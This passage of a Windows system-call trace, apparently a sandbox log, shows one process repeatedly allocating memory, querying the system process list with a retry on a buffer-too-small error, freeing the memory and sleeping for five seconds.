ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.407] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.410] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.421] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.460] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.460] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.460] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.463] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.473] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.474] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.474] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.476] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.476] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.483] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.485] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.486] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.499] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.500] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.500] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.502] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.503] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.516] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.516] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.517] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.517] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.519] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.530] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.531] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.533] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.533] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.548] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.549] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.550] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.566] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.567] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.570] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.577] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.580] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.593] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.596] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.609] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.609] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.613] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.627] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.627] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.643] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.658] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.671] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.672] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.672] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.674] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.675] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.689] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.690] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.705] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.706] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.721] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.734] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.736] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.737] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.749] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0137.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0137.752] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0137.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0137.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0137.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0137.765] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0137.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 